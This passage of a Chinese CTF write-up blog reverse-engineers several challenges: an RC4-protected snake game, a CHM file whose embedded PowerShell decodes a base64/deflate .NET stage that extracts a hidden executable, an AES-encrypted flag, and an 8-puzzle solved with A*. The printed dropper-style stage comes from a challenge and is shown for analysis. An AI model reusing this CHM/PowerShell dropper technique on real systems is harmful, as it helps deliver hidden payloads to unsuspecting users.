(<span class="number">0</span>, v43), (SCREEN_WIDTH, v43), LINE_WIDTH)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> v44 = v34 <span class="keyword">or</span> time.time()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> v44 - v39 > v38 <span class="keyword">and</span> <span class="keyword">not</span> v41:</span><br><span class="line"> v29 = True</span><br><span class="line"> v39 = v44</span><br><span class="line"> v45 = (v30[<span class="number">0</span>][<span class="number">0</span>] + v33[<span class="number">0</span>], v30[<span class="number">0</span>][<span class="number">1</span>] + v33[<span class="number">1</span>])</span><br><span class="line"> <span class="keyword">if</span> v45 == v31:</span><br><span class="line"> v30.appendleft(v45)</span><br><span class="line"> v36 += v32[<span class="number">0</span>]</span><br><span class="line"> v38 = v37 - <span class="number">0.03</span> * (v36 <span class="comment">// 100)</span></span><br><span class="line"> v31 = create_food(v30)</span><br><span class="line"> v32 = get_food_style()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">if</span> SCOPE_X[<span class="number">0</span>] <= v45[<span class="number">0</span>] <= SCOPE_X[<span class="number">1</span>]:</span><br><span class="line"> <span class="keyword">if</span> SCOPE_Y[<span class="number">0</span>] <= v45[<span class="number">1</span>] <= SCOPE_Y[<span class="number">1</span>]:</span><br><span class="line"> <span class="keyword">if</span> v45 <span class="keyword">not</span> in v30:</span><br><span class="line"> v30.appendleft(v45)</span><br><span class="line"> v30.pop()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> v34 = True</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> v34:</span><br><span class="line"> pygame.draw.<span class="built_in">rect</span>(v24, v32[<span class="number">1</span>], (v31[<span class="number">0</span>] * SIZE, v31[<span class="number">1</span>] * SIZE, SIZE, SIZE), <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">for</span> v46 in v30:</span><br><span class="line"> pygame.draw.<span class="built_in">rect</span>(v24, DARK, (v46[<span class="number">0</span>] * SIZE + LINE_WIDTH, v46[<span class="number">1</span>] * SIZE + LINE_WIDTH, SIZE - LINE_WIDTH * <span class="number">2</span>, SIZE - LINE_WIDTH * <span class="number">2</span>), <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> print_text(v24, v25, <span class="number">30</span>, <span class="number">7</span>, f<span class="string">"speed: {v36 // 100}"</span>)</span><br><span class="line"> print_text(v24, v25, <span class="number">450</span>, <span class="number">7</span>, f<span class="string">"score: {v36}"</span>)</span><br><span class="line"> <span class="keyword">if</span> v36 >= <span class="number">5192296858534827628530496329220096</span>:</span><br><span class="line"> v47 = flag</span><br><span class="line"> print_text(v24, v26, (SCREEN_WIDTH - v27) <span class="comment">// 2, (SCREEN_HEIGHT - v28) // 2, func(v47), RED)</span></span><br><span class="line"> <span class="keyword">if</span> v34:</span><br><span class="line"> <span class="keyword">if</span> v35:</span><br><span class="line"> print_text(v24, v26, (SCREEN_WIDTH - v27) <span class="comment">// 2, (SCREEN_HEIGHT - v28) // 2, 'GAME OVER', RED)</span></span><br><span class="line"> pygame.<span class="built_in">display</span>.update()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == '__main__':</span><br><span class="line"> main()</span><br><span class="line"><span class="meta"># okay decompiling main.pyc</span></span><br></pre></td></tr></table></figure></div><p>可以看到最后getflag这里(func())的程序逻辑就一个rc4加密,由rc4的特性可知加密和解密流程相同,故复用程序中的rc4()来得到flag。</p><p>uncompyle反编译出来的源码是python3,但是题目本身的源码是python2,注意编码问题。</p><blockquote><p>关于编码问题,可以看:</p><p><a href="https://pycoders-weekly-chinese.readthedocs.io/en/latest/issue5/unipain.html" target="_blank" rel="noopener">Unicode之痛 — PyCoder’s Weelky CN</a></p><p><a href="https://www.cnblogs.com/yangmingxianshen/p/7990102.html" target="_blank" rel="noopener">关于python2中的unicode和str以及python3中的str和bytes - 明王不动心 - 博客园</a></p></blockquote><p>这里因为反编译做了转换成python3的处理,所以脚本用python3写。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">DEFAULT_KEY = <span class="string">u'Y\xf3\x02\xc3%\x9a\x820\x0b\xbb%\x7f~;\xd2\xdc'</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">rc4</span><span class="params">(v11, key=DEFAULT_KEY, skip=<span class="number">1024</span>)</span>:</span></span><br><span class="line"> v12 = <span class="number">0</span></span><br><span class="line"> v13 = bytearray([v14 <span class="keyword">for</span> v14 <span class="keyword">in</span> range(<span class="number">256</span>)])</span><br><span class="line"> v12 = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> v15 <span class="keyword">in</span> range(<span class="number">256</span>):</span><br><span class="line"> v12 = (v12 + v13[v15] + ord(key[(v15 % len(key))])) % <span class="number">256</span></span><br><span class="line"> v16 = v13[v15]</span><br><span class="line"> v17 = v13[v12]</span><br><span class="line"> v13[v15] = v13[v12]</span><br><span class="line"> v13[v12] = v16</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> v12 = <span class="number">0</span></span><br><span class="line"> v18 = <span class="number">0</span></span><br><span class="line"> v19 = []</span><br><span class="line"> <span class="keyword">if</span> skip > <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">for</span> v15 <span class="keyword">in</span> range(skip):</span><br><span class="line"> v12 = (v12 + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line"> v18 = (v18 + v13[v12]) % <span class="number">256</span></span><br><span class="line"> v13[v12], v13[v18] = v13[v18], v13[v12]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> v20 <span class="keyword">in</span> v11:</span><br><span class="line"> v12 = (v12 + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line"> v18 = (v18 + v13[v12]) % <span class="number">256</span></span><br><span class="line"> v13[v12], v13[v18] = v13[v18], v13[v12]</span><br><span class="line"> v21 = v13[((v13[v12] + v13[v18]) % <span class="number">256</span>)]</span><br><span class="line"> v19.append(chr(ord(v20) ^ v21))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">''</span>.join(v19)</span><br><span class="line"><span class="comment"># def func(v22):</span></span><br><span class="line"><span class="comment"># v23 = rc4(v22)</span></span><br><span class="line"><span class="comment"># if v23.encode('utf-8').hex() == '275b39c381c28b701ac3972338456022c2ba06c3b04f5501471c47c38ac380c29b72c3b5c38a7ec2a5c2a0':</span></span><br><span class="line"><span class="comment"># return 'YOU WIN'</span></span><br><span class="line"><span class="comment"># return 'YOU LOSE'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># -=-=-=以上所有为源码中原函数-=-=-=</span></span><br><span class="line"></span><br><span class="line">cipher=<span class="string">'275b39c381c28b701ac3972338456022c2ba06c3b04f5501471c47c38ac380c29b72c3b5c38a7ec2a5c2a0'</span></span><br><span class="line">flag=bytes.fromhex(cipher).decode(<span class="string">'utf-8'</span>)</span><br><span class="line">print(rc4(flag))</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/g6xezQMJZ1KrtHG.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>flag{snake_bao_is_really_lucky}</strong></p><h2 id="print【TODO】"><a href="#print【TODO】" class="headerlink" title="print【TODO】"></a>print【TODO】</h2><p>【TODO】</p><p>这个题感觉大概知道怎么做,但就是不会啊(等wp…</p><p>贴一下当时的想法,看了看逻辑只有sprintf这种函数,除此以外没有别的可以改写内存数据的操作了。</p><p>动态调试跟了一下,猜测是sprintf格式化字符串漏洞写入?</p><blockquote><p><a href="https://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html" target="_blank" rel="noopener">Introduction to format string exploits</a></p><p><a href="https://www.cnblogs.com/liufang/p/3741943.html" target="_blank" rel="noopener">sprintf - stm32学习中 - 博客园</a></p></blockquote><p>pwn太菜了还没搞懂要怎么往output那里写(虽然这是逆向题orz</p><p>setup函数那里有一些format的初始化,主要是loop()那里,控制input(输入的字符串,全部为可见字符且长度>11),来改变使得output!=原来的output且output-1==48(‘0’)。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/ZnCHa4r7zSyE6mF.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><hr><h1 id="12-27-HarmonyOS和HMS专场"><a href="#12-27-HarmonyOS和HMS专场" class="headerlink" title="[12.27] HarmonyOS和HMS专场"></a>[12.27] HarmonyOS和HMS专场</h1><h2 id="re123"><a href="#re123" class="headerlink" title="re123"></a>re123</h2><p>用file命令可以看到是MS Windows HtmlHelp Data文件(即.chm),查看文件头也可以知道。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/bF3KO1qoyBtlYsp.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/hbBzlWCVeYx7Hqo.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>所以添加后缀名.chm。</p><p>关于chm文件有一个常用的反编译器ChmDecompiler,可以释放CHM里面的全部源文件(包括网页、文本、图片、CHM、ZIP、EXE等全部源文件),并且完美地恢复源文件的全部目录结构 (摘抄的简介。</p><p>所以用ChmDecompiler打开re.chm,解压缩,可以看到目录下出现一个包含四个文件的文件夹(其实源文件只有三个,.hhp是ChmDecompiler自动生成的)。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/BpgOKqmGQkyJrsj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>一个一个翻可以看到doc.htm里有一段奇怪的Item1。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/wKSVb18PU3mkIyu.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>大概可以看到是powershell的语法?(感觉像win后门,这么多no的参数</p><p>查了一下其实就是把后面那大段进行base64解码而已,用wsl解一下base64有</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/bOivFhTxp26oklP.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>然后得到了一段.NET代码(白字)。</p><p>通过查微软文档可以知道,这里是把base64解码以后的字符进行Deflate解压的过程,所以用脚本把中间那段base64解码,并整理输出。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> zlib</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">deflate</span><span class="params">(data)</span>:</span></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">return</span> zlib.decompress(data, -zlib.MAX_WBITS)</span><br><span class="line"> <span class="keyword">except</span> zlib.error:</span><br><span class="line"> <span class="keyword">return</span> zlib.decompress(data)</span><br><span class="line"></span><br><span class="line">code=<span class="string">'TY5BC4IwGIbvgv9hjB2McJhEhNChJMGTkN2qg7qvFHQT/bL575vpoV2/53n2skJJBInkQG5xwqOqhkcQXCATx7q+gkaHsvYj7kIVvCgburItVgm9MTxbVB5LATp5OlQvb6IMV0LdQvdPpu+8x66SL2eOrMl+Ck7naUA69ggND5UcoEOzI+pUc8p62G3TRZubv34K6IbLespADoGR27vv+R7HpqXzt8Q9y0IJI5N8RLCtLw=='</span></span><br><span class="line">de_code=deflate(base64.b64decode(code)).decode()</span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> de_code.split(<span class="string">'\r\n'</span>):</span><br><span class="line"> print(x)</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/TZFWzoduARpwx83.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>很明显的逻辑了,把doc.chm(应该是原来的re.chm)中”xxxxxxxx”后面的部分提取出来,还是用base64解码得到文件。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/E67OUyQPgYNV1Xm.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>把这后面的内容手动复制出来到cont.txt里,进行base64解码,最后存在theFile中。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">base64 -d cont.txt > theFile</span><br></pre></td></tr></table></figure></div><p>查看theFile可以猜测是exe(毕竟最开始给的就是有powershell指令的base64),把文件头补上,并改后缀名(即theFile.exe)。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/6KcR42PaXnLY1rI.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>用ida打开,通过FindCrypt插件可以看到AES,跟过去能看到AES加密时的S盒(其实这里前两个都是S盒,第三个是逆S盒),猜测用到了AES加密。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/qmiDpj72GShebNA.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/UZ6zyL2DmRIjx57.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>往上回溯找到主函数</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/r6NmeK9zjCbU87p.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>显然,这里是AES加密过程,sub_180001100()是密钥拓展过程,sub_1800015B0()是AES加密。</p><p>看了一下感觉是原装无魔改的AES,密文密钥都给了,那就直接写脚本解密。</p><p>注意这里是以整数形式给出的,别忘了小端序。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"><span class="keyword">from</span> binascii <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">arr=[<span class="number">0x16157E2B</span>,<span class="number">0xA6D2AE28</span>,<span class="number">0x8815F7AB</span>,<span class="number">0x3C4FCF09</span>]</span><br><span class="line">key=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">4</span>):</span><br><span class="line"> key=hex(arr[i])[<span class="number">2</span>:]+key</span><br><span class="line">key=unhexlify(key)[::<span class="number">-1</span>] <span class="comment">#注意小端序的问题</span></span><br><span class="line">tmp=<span class="number">0x46C42084AA2A1B56E799D643453FF4B5</span></span><br><span class="line">cipher=unhexlify(hex(tmp)[<span class="number">2</span>:])[::<span class="number">-1</span>]</span><br><span class="line">enc=AES.new(key,AES.MODE_ECB)</span><br><span class="line">print(enc.decrypt(cipher))</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/rqRu2Tfh1XG3oFA.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>flag{youcangues}</strong></p><h2 id="puzzle"><a href="#puzzle" class="headerlink" title="puzzle"></a>puzzle</h2><p>mips架构。</p><p>加载进ida以后,通过字符串回溯找到主函数。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/WwC3ns16k5dzTrv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/F8u7A1sJcbfWrmq.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>可以看到很明显的sub_401134()这个check,先往这里面看。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/8xzfqYPDGF3Avdu.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>看到是一个疑似maze的逻辑(</p><p>不过sub_400FA8()点进去以后可以看到是swap的功能</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="C:\Users\大仑子\AppData\Roaming\Typora\typora-user-images\image-20210111095327700.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>所以应该不是maze,是一个以交换为主的逻辑。</p><p>至于dword_4A0010,可以看到是一个九个数的数组。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/J7KAlX5oYTybhPQ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>v4和v5的出处在switch逻辑上面一点</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/icjk6frdNyuH5Fq.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>可以看到最后(v4,v5)其实表示了数组里0的位置,且数组实际可以看成是3*3。</p><p>即:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">4 0 3</span><br><span class="line">7 2 6</span><br><span class="line">8 1 5</span><br></pre></td></tr></table></figure></div><p>最后sub_400FFC()的检查逻辑:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/yZU2Fcs7OLIbGDg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>实际上就是要让这个3*3等于</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">1 2 3</span><br><span class="line">4 5 6</span><br><span class="line">7 8 0</span><br></pre></td></tr></table></figure></div><p>把0看成空位的话,很容易就想到3*3的华容道了。</p><p>(或者玩算法的小伙伴可能对八数码问题这个名字更熟悉?</p><p>有本事下次出数织啊!20*20我都给你火速解出来(来自数织爱好者的吐槽)</p><p>这里实际上是求最短能得到的路径(15步),懒得想了,直接去网上抓了个现成代码下来改了改。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#include <iostream></span></span><br><span class="line"><span class="comment">#include <vector></span></span><br><span class="line"><span class="comment">#include <ctime></span></span><br><span class="line"><span class="comment">#include <cstdlib></span></span><br><span class="line"><span class="comment">#define maxState 10000</span></span><br><span class="line"><span class="comment">#define N 3</span></span><br><span class="line">using namespace std;</span><br><span class="line"></span><br><span class="line">bool isEqual(int a[N][N][maxState],int b[N][N],int n){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> <span class="keyword">if</span>(a[i][j][n] != b[i][j]) <span class="keyword">return</span> false;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> true;</span><br><span class="line">}</span><br><span class="line">bool isEqual(int a[N][N],int b[N][N]){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> <span class="keyword">if</span>(a[i][j] != b[i][j]) <span class="keyword">return</span> false;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> true;</span><br><span class="line">}</span><br><span class="line">int evalute(int state[N][N],int target[N][N]){</span><br><span class="line"> int num = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++)</span><br><span class="line"> <span class="keyword">if</span>(state[i][j] != target[i][j]) num ++;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> num;</span><br><span class="line">}</span><br><span class="line">void findBrack(int a[N][N],int x,int y){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> <span class="keyword">if</span>(a[i][j] == <span class="number">0</span>) {</span><br><span class="line"> x = i;y = j;<span class="keyword">return</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">bool move(int a[N][N],int b[N][N],int dir){</span><br><span class="line"> //<span class="number">1</span> up <span class="number">2</span> down <span class="number">3</span> left <span class="number">4</span> right</span><br><span class="line"> int x = <span class="number">0</span>,y = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> b[i][j] = a[i][j];</span><br><span class="line"> <span class="keyword">if</span>(a[i][j] == <span class="number">0</span>) {</span><br><span class="line"> x = i;y = j;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span>(x == <span class="number">0</span> && dir == <span class="number">1</span>) <span class="keyword">return</span> false;</span><br><span class="line"> <span class="keyword">if</span>(x == N<span class="number">-1</span> && dir == <span class="number">2</span>) <span class="keyword">return</span> false;</span><br><span class="line"> <span class="keyword">if</span>(y == <span class="number">0</span> && dir == <span class="number">3</span>) <span class="keyword">return</span> false;</span><br><span class="line"> <span class="keyword">if</span>(y == N<span class="number">-1</span> && dir == <span class="number">4</span>) <span class="keyword">return</span> false;</span><br><span class="line"> <span class="keyword">if</span>(dir == <span class="number">1</span>){b[x<span class="number">-1</span>][y] = <span class="number">0</span>;b[x][y] = a[x<span class="number">-1</span>][y];}</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span>(dir == <span class="number">2</span>){b[x+<span class="number">1</span>][y] = <span class="number">0</span>;b[x][y] = a[x+<span class="number">1</span>][y];}</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span>(dir == <span class="number">3</span>){b[x][y<span class="number">-1</span>] = <span class="number">0</span>;b[x][y] = a[x][y<span class="number">-1</span>];}</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span>(dir == <span class="number">4</span>){b[x][y+<span class="number">1</span>] = <span class="number">0</span>;b[x][y] = a[x][y+<span class="number">1</span>];}</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">return</span> false;</span><br><span class="line"> <span class="keyword">return</span> true;</span><br><span class="line">}</span><br><span class="line">void statecpy(int a[N][N][maxState],int b[N][N],int n){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> a[i][j][n] = b[i][j];</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">void getState(int a[N][N][maxState],int b[N][N],int n){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> b[i][j] = a[i][j][n];</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">void statecpy(int a[N][N],int b[N][N]){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j++)</span><br><span class="line"> a[i][j] = b[i][j];</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">int checkAdd(int a[N][N][maxState],int b[N][N],int n){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < n;i ++){</span><br><span class="line"> <span class="keyword">if</span>(isEqual(a,b,i)) <span class="keyword">return</span> i;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">}</span><br><span class="line">int Astar(int a[N][N][maxState],int start[N][N],int target[N][N],int path[maxState]){</span><br><span class="line"> bool visited[maxState] = {false};</span><br><span class="line"> int fitness[maxState] = {<span class="number">0</span>};</span><br><span class="line"> int passLen[maxState] = {<span class="number">0</span>};</span><br><span class="line"> int curpos[N][N];</span><br><span class="line"> statecpy(curpos,start);</span><br><span class="line"> int id = <span class="number">0</span>,Curid = <span class="number">0</span>;</span><br><span class="line"> fitness[id] = evalute(curpos,target);</span><br><span class="line"> statecpy(a,start,id++);</span><br><span class="line"> <span class="keyword">while</span>(!isEqual(curpos,target)){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">1</span>;i < <span class="number">5</span>;i ++){//向四周找方向</span><br><span class="line"> int tmp[N][N] = {<span class="number">0</span>};</span><br><span class="line"> <span class="keyword">if</span>(move(curpos,tmp,i)){</span><br><span class="line"> int state = checkAdd(a,tmp,id);</span><br><span class="line"> <span class="keyword">if</span>(state == <span class="number">-1</span>){//<span class="keyword">not</span> add</span><br><span class="line"> path[id] = Curid;</span><br><span class="line"> passLen[id] = passLen[Curid] + <span class="number">1</span>;</span><br><span class="line"> fitness[id] = evalute(tmp,target) + passLen[id];</span><br><span class="line"> statecpy(a,tmp,id++);</span><br><span class="line"> }<span class="keyword">else</span>{//add</span><br><span class="line"> int len = passLen[Curid] + <span class="number">1</span>,fit = evalute(tmp,target) + len;</span><br><span class="line"> <span class="keyword">if</span>(fit < fitness[state]){</span><br><span class="line"> path[state] = Curid;</span><br><span class="line"> passLen[state] = len;</span><br><span class="line"> fitness[state] = fit;</span><br><span class="line"> visited[state] = false;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> visited[Curid] = true;</span><br><span class="line"> //找到适应度最小的最为下一个带搜索节点</span><br><span class="line"> int minCur = <span class="number">-1</span>;</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < id;i ++)</span><br><span class="line"> <span class="keyword">if</span>(!visited[i] && (minCur == <span class="number">-1</span> || fitness[i] < fitness[minCur])) minCur = i;</span><br><span class="line"> Curid = minCur;</span><br><span class="line"> getState(a,curpos,Curid);</span><br><span class="line"> <span class="keyword">if</span>(id == maxState) <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> Curid;</span><br><span class="line">}</span><br><span class="line">void show(int a[N][N][maxState],int n){</span><br><span class="line"> cout << <span class="string">"-------------------------------\n"</span>;</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j =<span class="number">0</span>;j < N;j ++){</span><br><span class="line"> cout << a[i][j][n] << <span class="string">" "</span>;</span><br><span class="line"> }</span><br><span class="line"> cout << endl;</span><br><span class="line"> }</span><br><span class="line"> cout << <span class="string">"-------------------------------\n"</span>;</span><br><span class="line">}</span><br><span class="line">int calDe(int a[N][N]){</span><br><span class="line"> int sum = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N*N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = i+<span class="number">1</span>;j < N*N;j ++){</span><br><span class="line"> int m,n,c,d;</span><br><span class="line"> m = i/N;n = i%N;</span><br><span class="line"> c = j/N;d = j%N;</span><br><span class="line"> <span class="keyword">if</span>(a[c][d] == <span class="number">0</span>) <span class="keyword">continue</span>;</span><br><span class="line"> <span class="keyword">if</span>(a[m][n] > a[c][d]) sum ++;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> sum;</span><br><span class="line">}</span><br><span class="line">void autoGenerate(int a[N][N]){</span><br><span class="line"> int maxMove = <span class="number">50</span>;</span><br><span class="line"> srand((unsigned)time(NULL));</span><br><span class="line"> int tmp[N][N];</span><br><span class="line"> <span class="keyword">while</span>(maxMove --){</span><br><span class="line"> int dir = rand()%<span class="number">4</span> + <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">if</span>(move(a,tmp,dir)) statecpy(a,tmp);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">int main(){</span><br><span class="line"> int a[N][N][maxState] = {<span class="number">0</span>};</span><br><span class="line"> // int start[N][N] = {<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">0</span>};</span><br><span class="line"> // autoGenerate(start);</span><br><span class="line"> // cout << start[<span class="number">0</span>][<span class="number">0</span>] << start[<span class="number">1</span>][<span class="number">1</span>];</span><br><span class="line"> int start[N][N] = {<span class="number">4</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">7</span>,<span class="number">2</span>,<span class="number">6</span>,<span class="number">8</span>,<span class="number">1</span>,<span class="number">5</span>};</span><br><span class="line"> int target[N][N] = {<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span 